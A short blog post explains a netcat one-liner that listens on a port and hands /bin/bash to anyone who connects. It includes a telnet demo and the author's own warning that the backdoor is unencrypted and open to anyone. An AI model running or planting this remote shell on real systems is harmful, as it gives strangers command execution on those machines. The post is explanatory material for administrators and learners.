Remote backdoor on Linux using ‘nc’

nc -l -e /bin/bash -p 10001

Not much to explain here. -l listens for incoming connections, -e executes /bin/bash when you connect, and -p chooses the port to listen on.

You must use a semicolon after each command.

will@hydra:~$ telnet localhost 10001
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
whoami;
will

There you go. Obviously this has the potential for misuse; running this as root will create a remote backdoor after all. But it’s also a very useful administrative tool. Keep in mind that nc is not encrypted in any way, and anyone could use this to connect.

nc terminates after you exit your connection, and only one person can be connected at once.

2 thoughts on “Remote backdoor on Linux using ‘nc’”

Leave a Reply

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.